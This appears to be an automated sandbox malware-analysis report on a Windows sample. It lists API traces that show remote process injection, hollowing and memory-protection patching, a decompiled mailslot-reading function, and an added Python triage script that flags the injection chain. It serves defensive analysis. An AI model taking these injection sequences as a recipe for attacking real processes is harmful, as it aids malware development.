  • Opcode ID: 5d54db91bb8872728a7f338422e6e2575366b81ba5fa63999995d3bab01c6a8b
  • Instruction ID: 7046ed55330d99fded0f4fc859fbdadb162bd0e82c17059ba0f8a3e3f23ff779
  • Opcode Fuzzy Hash: 6C01CE6A618AC256DC3774402413ED2E544DF837C2D4C36339BAB2363F1B813246B70D
  • Instruction Fuzzy Hash: 7046ed55330d99fded0f4fc859fbdadb162bd0e82c17059ba0f8a3e3f23ff779
APIs
    • Part of subcall function 001DA12F: lstrcmp.KERNEL32(?,00000000), ref: 001DA1E4
    • Part of subcall function 001DA12F: lstrlen.KERNEL32(?,00000001,00000000,?), ref: 001DA1EF
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,?,00000000,001D7F8B,001E7508,0000001C,001D7C1F,00000002,00000000,00000001,00000001,?,00000001), ref: 001D7AA7
  • GetLastError.KERNEL32(?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001,?,001CD6FE), ref: 001D7BB8
    • Part of subcall function 001D799E: lstrlen.KERNEL32(?,?,?,?,001CB2EF), ref: 001D79D6
    • Part of subcall function 001D799E: lstrcpy.KERNEL32(00000000,?), ref: 001D79ED
    • Part of subcall function 001D799E: StrChrA.SHLWAPI(00000000,0000002E), ref: 001D79F6
    • Part of subcall function 001D799E: GetModuleHandleA.KERNEL32(00000000,?,001CB2EF), ref: 001D7A14
  • VirtualProtect.KERNELBASE(00000000,00000005,00000040,?,00000000,?,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000), ref: 001D7B07
  • VirtualProtect.KERNELBASE(00000000,00000005,00000040,00000040,?,001D7F8B,00000000,?,?), ref: 001D7B3B
  • VirtualProtect.KERNELBASE(?,00000004,00000000,00000000,00000000,001CB2EF,?,001D7F8B,00000000,?,?,?,001CB2EF,00000000,00000000,00000001), ref: 001D7B52
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7B72
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7B90
    • Part of subcall function 001D8479: NtQueryInformationProcess.NTDLL(00000000,?,00000018,00000000,001EB220), ref: 001D8490
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 65
  • API ID: VirtualProtect$GetLastErrorlstrcpylstrlen
  • String ID:
  • API String ID: 208590223-0
  • Opcode ID: c5fcf50122d35def001d29232e694ba35af908110bc64aa401ca479f181033be
  • Instruction ID: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
  • Opcode Fuzzy Hash: 18F04E475442424BEDC63DC4165325AED98EFD3D9481C6373FE161499642902225FF2D
  • Instruction Fuzzy Hash: a6448fe3859533787f46fd028fbdedb87b619524ac454660b260fde8abe63a7b
APIs
  • lstrlen.KERNEL32(74C08500,?,00000000,001CD8AF,?,001EB068), ref: 001D7D47
  • VirtualProtect.KERNELBASE(00000000,00000000,00000040,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D59
  • lstrcpy.KERNEL32(00000000,74C08500), ref: 001D7D68
  • VirtualProtect.KERNELBASE(00000000,00000000,?,-0000001C,?,00000000,001CD8AF,?,001EB068), ref: 001D7D79
  • VirtualProtect.KERNELBASE(?,00000005,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DA7
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DC2
  • VirtualProtect.KERNELBASE(?,00000004,00000040,-0000001C,001E74D8,00000018,001D7F15,001E51C0,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7DFE
  • VirtualProtect.KERNELBASE(?,00000004,?,-0000001C,?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E18
  • GetLastError.KERNEL32(?,00000000,001CD8AF,?,001EB068,?,00000000,001C13EB), ref: 001D7E1F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 199
  • API ID: CloseHandleCreateThreadHeapCreateHeapDestroyInterlockedDecrementInterlockedIncrementSleepEx
  • String ID:
  • API String ID: 2400451634-0
  • Opcode ID: a72f6809e5b1c4c7d5409b103898ea3008340710279a26a1989ceb7ae5150f24
  • Instruction ID: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
  • Opcode Fuzzy Hash: F6E02B8C1B8C09C3C66C0C8B15B4B121153CFE2F119FCD38932A06A41DA356BC346F8C
  • Instruction Fuzzy Hash: daf0d4e155e827e815f2ee8bf8cc5b795d7ec07deb7fbc433d53599e33d6748b
APIs
  • InterlockedIncrement.KERNEL32(01B37448), ref: 01B310B0
  • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 01B310C5
    • Part of subcall function 01B31000: memcpy.NTDLL(01B37570,?,0000000C,01B36248,0000000C,01B310E9,?,00000000,?), ref: 01B31038
  • CreateThread.KERNEL32(00000000,00000000,Function_0000005B,00000000,?,00000000), ref: 01B310F1
  • InterlockedDecrement.KERNEL32(01B37448), ref: 01B31109
  • SleepEx.KERNEL32(00000064,00000001), ref: 01B31125
  • CloseHandle.KERNEL32 ref: 01B31141
  • HeapDestroy.KERNEL32 ref: 01B3114E
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 190
  • API ID: GetLastError$CloseHandleCreateMailslotHeapReAllocReadFileSleep
  • String ID: \\.\mailslot\msl0
  • API String ID: 2393858888-622273203
  • Opcode ID: a541a8e2a336522e40d1be30749048c9d818c078e896fa602c1e5c17c186f932
  • Instruction ID: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
  • Opcode Fuzzy Hash: 7FE026810629C5C686BB500A28013B370CBBB7178BD9EE7700AA7390831FC23017564A
  • Instruction Fuzzy Hash: 7e71ddcab038e9fbb5af92cb551e5fddf836ff781830246c217a5dd699dbe395
C-Code - Quality: 96%
			E00401033(void* _a4) {
				signed int _v8;
				long _v12;
				long _v16;
				void* _v20;
				void* _t24;
				long _t25;
				void* _t27;
				int _t32;
				long _t33;
				void* _t34;
				void* _t36;
				long _t39;

				_pop(_t41);
				_t39 = 0;
				_v8 = 0x1000;
				_t24 = CreateMailslotA("\\\\.\\mailslot\\msl0", 0x1000, 0, 0);
				_v16 = _t24;
				if(_t24 == 0) {
					_t25 = GetLastError();
					_t36 = _a4;
					_v8 = _t25;
				} else {
					_t36 = E004011F2(0x1000);
					if(_t36 == 0) {
						L10:
						_v8 = 8;
					} else {
						do {
							_t32 = ReadFile(_v20, _t36 + _t39, 0x1000,  &_v16, 0); // executed
							if(_t32 == 0) {
								_t33 = GetLastError();
								_v8 = _t33;
								if(_t33 == 0x79) {
									_v16 = 0x1000;
									goto L8;
								}
							} else {
								_v12 = _v12 + 0x1000;
								_t39 = _t39 + _v16;
								_t34 = HeapReAlloc( *0x40305c, 0, _t36, _v12); // executed
								_t36 = _t34;
								if(_t36 == 0) {
									goto L10;
								} else {
									_v8 = _v8 & 0x00000000;
									goto L8;
								}
							}
							goto L11;
							L8:
							Sleep(0x64); // executed
						} while (_v16 == 0x1000);
					}
					L11:
					CloseHandle(_v20);
				}
				if(_v8 == 0) {
					_t27 = _a4;
					 *(_t27 + 4) = _t36;
					 *((intOrPtr*)(_t27 + 8)) = _t39;
				}
				return _v8;
			}
APIs
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
  • GetLastError.KERNEL32 ref: 004010D6
    • Part of subcall function 004011F2: RtlAllocateHeap.NTDLL(00000000,?,00401062,00001000), ref: 004011FE
  • ReadFile.KERNEL32(?,?,00001000,?,00000000), ref: 00401076
  • HeapReAlloc.KERNEL32(00000000,00000000,?), ref: 00401092
  • GetLastError.KERNEL32 ref: 004010A4
  • Sleep.KERNELBASE(00000064), ref: 004010B7
  • CloseHandle.KERNEL32(?), ref: 004010CE
Strings
Memory Dump Source
  • Source File: 00000003.00000001.563023218.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
  • Associated: 00000003.00000001.563010253.00400000.00000002.sdmp
  • Associated: 00000003.00000001.563037124.00402000.00000002.sdmp
  • Associated: 00000003.00000001.563047325.00403000.00000008.sdmp
Similarity
  • Total matches: 194
  • API ID: GetLastError$CreateFileCreateFileMappingGetFileSizeMapViewOfFile
  • String ID:
  • API String ID: 1233022807-0
  • Opcode ID: 9e01726764579839827e9094e6fbaf3217b41c7c4a8b193b143c1758af8567f1
  • Instruction ID: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
  • Opcode Fuzzy Hash: 43D0C2690F8C3ED0810A040688F172332011FA0B4E63CD81537A134011E7F07789CB0C
  • Instruction Fuzzy Hash: f3065377c1a67cced7b9e4e4ac72f043be95fb12174c7614bd48391945ad500a
APIs
  • CreateFileW.KERNEL32(01B374BC,80000000,00000001,00000000,00000003,00000000,00000000), ref: 01B31689
  • CreateFileMappingW.KERNELBASE(00000000,00000000,00000002,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B3169F
  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,?,00000000,?,01B37494), ref: 01B316B7
  • GetFileSize.KERNEL32(00000000,00000000,?,00000000,?,01B37494), ref: 01B316C9
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316D7
  • GetLastError.KERNEL32(?,00000000,?,01B37494), ref: 01B316E4
  • GetLastError.KERNEL32(?,01B37494), ref: 01B316F3
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 307
  • API ID: ResumeThread$GetLastErrorSuspendThreadWaitForSingleObjectmemset
  • String ID:
  • API String ID: 307323562-0
  • Opcode ID: 9df6b1f1380250b2af8b1cb859a0ad26280c930233838fa98c0b82c5bdb989db
  • Instruction ID: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
  • Opcode Fuzzy Hash: 3B01FE0E036F83C2ED6626011251FA1A381BF43A70E8EA726B371213DE5F54B50D870D
  • Instruction Fuzzy Hash: d810341e17c9846fb7eb72bd25c8721f3d17f62b90e0e7662ab2ee7fa51b92a0
APIs
  • memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
    • Part of subcall function 01B33DE6: NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
    • Part of subcall function 01B33DE6: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
    • Part of subcall function 01B33DE6: SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
  • ResumeThread.KERNELBASE(?), ref: 01B32418
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000,01B324C1), ref: 01B31A4D
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000000,00000000,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1), ref: 01B31A81
  • ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
  • WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
  • SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
    • Part of subcall function 01B32175: memset.NTDLL ref: 01B321A3
    • Part of subcall function 01B32175: ResumeThread.KERNEL32(?,?,00000004,00000004,?,?,?,?,?,00000004,?), ref: 01B3222D
    • Part of subcall function 01B32175: WaitForSingleObject.KERNEL32(00000064), ref: 01B3223B
    • Part of subcall function 01B32175: SuspendThread.KERNEL32(?), ref: 01B3224E
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,?,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31DE0
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,CCCCFEEB,00000018,?,?,01B323F9,?,01B323F9,01B323F9,?,?,?,?,00000000), ref: 01B31E2F
    • Part of subcall function 01B31CB2: memcpy.NTDLL(?,01B324F9,00000800,?,?,?,00000000), ref: 01B31E9F
    • Part of subcall function 01B31CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
    • Part of subcall function 01B31CB2: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B31ED1
    • Part of subcall function 01B31CB2: CloseHandle.KERNEL32(00000000), ref: 01B31EE0
    • Part of subcall function 01B31CB2: memset.NTDLL ref: 01B31EF4
  • GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 154
  • API ID: CloseHandleGetLastError$CreateRemoteThreadOpenProcess
  • String ID:
  • API String ID: 2418253885-0
  • Opcode ID: 74eade3f190c4a0697bbd14a78cdb86cd2f7d3a49057973da75d73adb6c5ad00
  • Instruction ID: ba81e1bd50bbb7c9520713aa0ed0ba502187510d5805783624cd8a3d9e27a4cb
  • Opcode Fuzzy Hash: 88E05C50053DC7C59834A89704E0BB3F141FE51306AAC6B28363824614AF583E275B44
  • Instruction Fuzzy Hash: ba81e1bd50bbb7c9520713aa0ed0ba502187510d5805783624cd8a3d9e27a4cb
APIs
    • Part of subcall function 01B332C5: GetModuleHandleA.KERNEL32(01B3811F,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B332DF
    • Part of subcall function 01B332C5: GetProcAddress.KERNEL32(00000000,01B3865C,?,?,01B31790,00000000,?,01B37494), ref: 01B332F0
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
    • Part of subcall function 01B332C5: IsWow64Process.KERNELBASE(01B374A4,?,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3331E
    • Part of subcall function 01B332C5: CloseHandle.KERNEL32(01B374A4), ref: 01B33331
  • OpenProcess.KERNEL32(001F0FFF,00000000,01B315DA,01B315DA,C000009A,01B37494,00000000,?,?,01B315DA,?,00000000,?,01B37494), ref: 01B32452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324AC
  • GetLastError.KERNEL32(?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324CE
    • Part of subcall function 01B322D2: memset.NTDLL ref: 01B322F5
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?,00000000,01B324C1,CCCCFEEB,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B32380
    • Part of subcall function 01B322D2: WaitForSingleObject.KERNEL32(00000064), ref: 01B3238E
    • Part of subcall function 01B322D2: SuspendThread.KERNELBASE(?), ref: 01B323A1
    • Part of subcall function 01B322D2: GetLastError.KERNEL32(00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B3240D
    • Part of subcall function 01B322D2: ResumeThread.KERNELBASE(?), ref: 01B32418
  • CloseHandle.KERNEL32(01B315DA), ref: 01B324C6
  • CloseHandle.KERNEL32(?), ref: 01B324E0
  • GetLastError.KERNEL32(?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324E8
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
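The three entries above record a remote-injection chain (OpenProcess with 0x1F0FFF, CreateRemoteThread, VirtualProtectEx to 0x40, NtUnmapViewOfSection in a subcall, SuspendThread/ResumeThread) next to a benign-looking OpenProcess with 0x400 used only for the IsWow64Process check, and the first entry records the mailslot name in clear. Reading those bulleted lines by eye is error-prone, so the following Python is an example added to this report (not Joe Sandbox code and not the sample's code) that parses the report's "APIs" line format, decodes the OpenProcess access mask, flags the injection pieces and pulls string arguments such as the mailslot name as IOCs. The sample lines are copied from the entries above and embedded as constructed input; the flagging rules are this example's heuristic, not the sandbox's classification. 0x1F0FFF is PROCESS_ALL_ACCESS as defined by pre-Vista SDK headers (Vista and later headers define it as 0x1FFFFF), which is why that value, rather than a hand-picked subset of rights, shows up in the trace.

```python
"""Triage helper for the bulleted 'APIs' trace lines in a Joe Sandbox report.

Example added to this report (not Joe Sandbox code, not the sample's code).
Parses lines such as
    • OpenProcess.KERNEL32(001F0FFF,...), ref: 01B32452
    • Part of subcall function 01B31CB2: NtUnmapViewOfSection.NTDLL(...), ref: 01B31ECA
decodes the OpenProcess access mask and flags the injection chain.
"""
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed input: lines copied from the trace entries above.
SAMPLE_TRACE = r"""
  • OpenProcess.KERNEL32(001F0FFF,00000000,01B315DA,01B315DA,C000009A,01B37494,00000000,?,?,01B315DA,?,00000000,?,01B37494), ref: 01B32452
  • CreateRemoteThread.KERNEL32(?,00000000,00000000,00000000,00000000,00000004,00000000,?,?,01B315DA,?,00000000,?,01B37494), ref: 01B324AC
    • Part of subcall function 01B31A30: VirtualProtectEx.KERNELBASE(?,00000004,00000004,00000040,00000000,00000000,00000000,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000,01B324C1), ref: 01B31A4D
    • Part of subcall function 01B31CB2: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 01B31ECA
    • Part of subcall function 01B332C5: OpenProcess.KERNEL32(00000400,00000000,01B37494,01B3618C,0000000C,?,?,01B31790,00000000,?,01B37494), ref: 01B3330D
  • SuspendThread.KERNELBASE(?), ref: 01B323A1
  • ResumeThread.KERNELBASE(?), ref: 01B32418
  • GetLastError.KERNEL32 ref: 004010D6
  • CreateMailslotA.KERNEL32(\\.\mailslot\msl0,00001000,00000000,00000000), ref: 0040104F
"""

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# PROCESS_* access bits; their union 0x1F0FFF is PROCESS_ALL_ACCESS as defined
# by pre-Vista SDK headers (Vista+ headers define it as 0x1FFFFF).
PROCESS_RIGHTS = [
    (0x0001, "PROCESS_TERMINATE"), (0x0002, "PROCESS_CREATE_THREAD"),
    (0x0004, "PROCESS_SET_SESSIONID"), (0x0008, "PROCESS_VM_OPERATION"),
    (0x0010, "PROCESS_VM_READ"), (0x0020, "PROCESS_VM_WRITE"),
    (0x0040, "PROCESS_DUP_HANDLE"), (0x0080, "PROCESS_CREATE_PROCESS"),
    (0x0100, "PROCESS_SET_QUOTA"), (0x0200, "PROCESS_SET_INFORMATION"),
    (0x0400, "PROCESS_QUERY_INFORMATION"), (0x0800, "PROCESS_SUSPEND_RESUME"),
    (0x000F0000, "STANDARD_RIGHTS_REQUIRED"), (0x00100000, "SYNCHRONIZE"),
]
INJECT_RIGHTS = 0x0002 | 0x0008 | 0x0020  # CREATE_THREAD | VM_OPERATION | VM_WRITE
PAGE_EXECUTE_READWRITE = 0x40


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]          # raw stack values as printed, e.g. "001F0FFF" or "?"
    ref: str                 # address of the call site
    parent: Optional[str]    # subcall function the line is attributed to, if any


def parse_trace(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        calls.append(ApiCall(m.group("api"), m.group("module"),
                             raw.split(",") if raw else [], m.group("ref"), m.group("parent")))
    return calls


def as_int(arg: str) -> Optional[int]:
    """Joe Sandbox prints stack values as 8 hex digits; anything else ('?', strings) is not a number."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", arg) else None


def decode_process_access(mask: int) -> List[str]:
    names = [name for bit, name in PROCESS_RIGHTS if mask & bit == bit]
    covered = sum(bit for bit, _ in PROCESS_RIGHTS if mask & bit == bit)
    if mask & ~covered:
        names.append("UNKNOWN_0x%X" % (mask & ~covered))
    return names


def flag_injection(calls: List[ApiCall]) -> List[str]:
    """Heuristic (this example's, not the sandbox's): report the pieces of a remote-injection chain."""
    findings = []
    for c in calls:
        if c.api == "OpenProcess" and c.args:
            mask = as_int(c.args[0])
            if mask is not None and mask & INJECT_RIGHTS == INJECT_RIGHTS:
                findings.append("OpenProcess @%s with write/thread rights 0x%X" % (c.ref, mask))
        if c.api == "VirtualProtectEx" and len(c.args) >= 4 and as_int(c.args[3]) == PAGE_EXECUTE_READWRITE:
            findings.append("VirtualProtectEx @%s sets PAGE_EXECUTE_READWRITE" % c.ref)
    names = {c.api for c in calls}
    if "CreateRemoteThread" in names:
        findings.append("CreateRemoteThread: code execution in the opened process")
    if "NtUnmapViewOfSection" in names:
        findings.append("NtUnmapViewOfSection: section replacement (hollowing indicator)")
    if {"SuspendThread", "ResumeThread"} <= names:
        findings.append("SuspendThread/ResumeThread: remote thread manipulation")
    return findings


def extract_string_iocs(calls: List[ApiCall]) -> List[str]:
    """String-typed arguments (object names, paths) the trace shows in clear, e.g. the mailslot name."""
    return [a for c in calls for a in c.args if "\\" in a or "%" in a]


if __name__ == "__main__":
    parsed = parse_trace(SAMPLE_TRACE)
    for finding in flag_injection(parsed):
        print(finding)
    print("IOCs:", extract_string_iocs(parsed))
```

Run over the sample it reports five findings for the injection entries, stays silent on the 0x400 OpenProcess from the Wow64 check, and returns the mailslot name as the only string IOC; feeding it the full "APIs" sections of a report (including the "Part of subcall function" lines, which it attributes to their parent) gives a per-function summary that can be diffed across samples.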
Similarity
  • Total matches: 31
  • API ID: CreateEventGetLastErrorInterlockedDecrementOpenEventRtlExitUserThreadWaitForMultipleObjects
  • String ID:
  • API String ID: 420885392-0
  • Opcode ID: d33af0a5ccd8da24651d90541fd71a469b169468326c88d3ba2cd7f680d024ee
  • Instruction ID: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
  • Opcode Fuzzy Hash: 38E02B3406094157223F70A4A211B7F4ED8F8872C268D638BFC283D2AD5A0791E62557
  • Instruction Fuzzy Hash: 3c37b9249d7f180ebea28303f94ffcd4ec94dd99ac367b312ba22497ea172778
APIs
  • OpenEventA.KERNEL32(00100000,00000000), ref: 001CD1A0
  • CreateEventA.KERNEL32(001EB0D8,00000001,00000000), ref: 001CD1BB
  • GetLastError.KERNEL32 ref: 001CD1C8
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001CD1EB
  • InterlockedDecrement.KERNEL32(001EAF4C), ref: 001CD217
    • Part of subcall function 001C13D6: SetEvent.KERNEL32(001EB094,001CD22D), ref: 001C13E0
    • Part of subcall function 001C13D6: CloseHandle.KERNEL32(001EB094), ref: 001C13F5
    • Part of subcall function 001C13D6: HeapDestroy.KERNELBASE(001EAF48), ref: 001C1405
  • RtlExitUserThread.NTDLL(00000000), ref: 001CD22E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 3
  • API ID: HeapFreeLocalFreeReleaseMutexRtlRemoveVectoredExceptionHandlerSleepEx
  • String ID:
  • API String ID: 567273588-0
  • Opcode ID: ab5aec27645f8af340170e833bba8119d55850c0883528ab0e192ea95400f4cf
  • Instruction ID: 0f4f74b15e85b15de101cfb7422835ebe1d854837d6f51dffef29935a7c65f93
  • Opcode Fuzzy Hash: 1A0149B715154283E0BF24D4CA047BE9A4DDB906DAACC6A47FE15705885A0FD6C03FC1
  • Instruction Fuzzy Hash: 0f4f74b15e85b15de101cfb7422835ebe1d854837d6f51dffef29935a7c65f93
APIs
  • SleepEx.KERNELBASE(00000064,00000001,?,001EB068,?,00000000,001C13EB), ref: 001CD8B9
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001C1EFC: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1F04
  • HeapFree.KERNEL32(00000000,001EB160), ref: 001CD964
  • RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CD99D
  • ReleaseMutex.KERNEL32(001EB020,?,001EB068,?,00000000,001C13EB), ref: 001CD9AD
  • LocalFree.KERNEL32(?,001EB068,?,00000000,001C13EB), ref: 001CDA08
    • Part of subcall function 001CE2B9: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001CE2C2
    • Part of subcall function 001CE2B9: Sleep.KERNEL32(0000000A,?,001EB068,?,00000000,001C13EB), ref: 001CE2CC
    • Part of subcall function 001CE2B9: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001CE2F7
    • Part of subcall function 001DAB1D: RtlLeaveCriticalSection.NTDLL(001EAFF4), ref: 001DAB5B
    • Part of subcall function 001DAB1D: HeapFree.KERNEL32(00000000,001EAFF4), ref: 001DAB6A
    • Part of subcall function 001D80C6: GetVersion.KERNEL32(001EB068,00000000,001E51C0,?,001CD8AA,?,001EB068,?,00000000,001C13EB), ref: 001D80EA
    • Part of subcall function 001D80C6: GetModuleHandleA.KERNEL32(001EC8C6,001ED08E,?,001CD8AA,?,001EB068,?,00000000,001C13EB), ref: 001D80FE
    • Part of subcall function 001D80C6: GetProcAddress.KERNEL32(00000000,?,001CD8AA,?,001EB068,?,00000000,001C13EB), ref: 001D8105
    • Part of subcall function 001D7EEA: RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D7EF4
    • Part of subcall function 001D7EEA: RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D7F30
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 97
  • API ID: VirtualProtect$GetLastErrorRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2510858262-0
  • Opcode ID: 79e378e90741fe03a1868ff575f465e1dcc9b1d4b7d085768b56240e49bf8d92
  • Instruction ID: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
  • Opcode Fuzzy Hash: B2019C28149E95B7D43BB0841C52EC1C254BB53294C1D6372E892241C73F007709BB19
  • Instruction Fuzzy Hash: b71b97ef5479de36d879d8d355e30c69e4ba8c71cacd4cd7061dd0a4881f638c
APIs
    • Part of subcall function 001D75AC: GetLastError.KERNEL32(00000024,?,001D7807,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?,?,00000000,001E5050,00000000), ref: 001D75D9
    • Part of subcall function 001D9FF2: lstrcmpi.KERNEL32(?,00000000), ref: 001DA027
  • VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,00000000,?,00000000,00000000,00000000,001E7518,00000014,001D7FAE,?,00000000,?), ref: 001D7865
  • VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,001CB2EF), ref: 001D789F
  • RtlLeaveCriticalSection.NTDLL(001EB220), ref: 001D78E5
    • Part of subcall function 001D7646: lstrlen.KERNEL32(00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7678
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000040,00000000,00000000,001CB2EF,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D7692
    • Part of subcall function 001D7646: VirtualProtect.KERNELBASE(00000000,00000004,00000000,00000000,?,?,?,001D78B8,00000000,?,001CB2EF), ref: 001D76C5
  • RtlEnterCriticalSection.NTDLL(001EB220), ref: 001D78C7
  • GetLastError.KERNEL32(?,001CB2EF), ref: 001D78FA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DA098: lstrcmpi.KERNEL32(?,00000000), ref: 001DA0DC
Memory Dump Source
